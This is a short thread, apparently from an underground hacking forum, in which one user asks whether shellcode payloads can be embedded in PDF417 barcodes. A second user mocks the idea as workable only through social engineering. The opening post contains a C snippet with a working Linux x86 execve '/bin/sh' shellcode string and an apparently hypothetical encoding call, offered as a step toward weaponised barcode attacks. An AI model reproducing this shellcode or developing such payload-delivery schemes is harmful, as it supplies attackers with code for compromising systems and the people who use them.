Theory in Mal-Practice: Stacked Linear Symbology?

DimmuBurgor · 20.01.2023

Would appreciate your guys input about the practical applicability of novel 2d symbology incorporation concepts. Most of the ideas I've read about are simple QR social engineering attacks, but- assuming image sensor reading incompatibility isn't a non-starter, can we embed shellcode payloads to PDF417? Or would machine instructions simply not comply with base 929?

Код:

#include <stdio.h>
#include <string.h>
#include <pdf417.h>

int main(int argc, char *argv[]) {
    char shellcode[] = "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\xb0\x0b\xcd\x80";
    int shellcode_len = strlen(shellcode);
    char * encoded_shellcode;
    int encoded_len;

    // Encode shellcode into PDF417 symbology
    pdf417_encode(shellcode, shellcode_len, &encoded_shellcode, &encoded_len);

    // ... code to save or transmit encoded shellcode here ...

    free(encoded_shellcode);
}

Tolerance for my nescience is graciously appreciated =)))

kiloton · 20.01.2023

Shellcode to PDF417? And your target will scan a QR code and download
it from your URL shortener? Because the maximum size is of PDF417 is 1kb.

Good luck with that

DimmuBurgor · 20.01.2023

No URL or QR

kiloton · 20.01.2023

No URL or QR? Zero-click? Contact me, I pay more than bug bounty/snickers/mars.
Sarcasm of course. You can't weaponize this, only social engineering.

DimmuBurgor · 20.01.2023

kiloton сказал(а):

No URL or QR? Zero-click? Contact me, I pay more than bug bounty/snickers/mars.
Sarcasm of course. You can't weaponize this, only social engineering.

Thank you brat =J

Theory in Mal-Practice: Stacked Linear Symbology?

DimmuBurgor

CPU register

kiloton

RAM

DimmuBurgor

CPU register

kiloton

RAM

DimmuBurgor

CPU register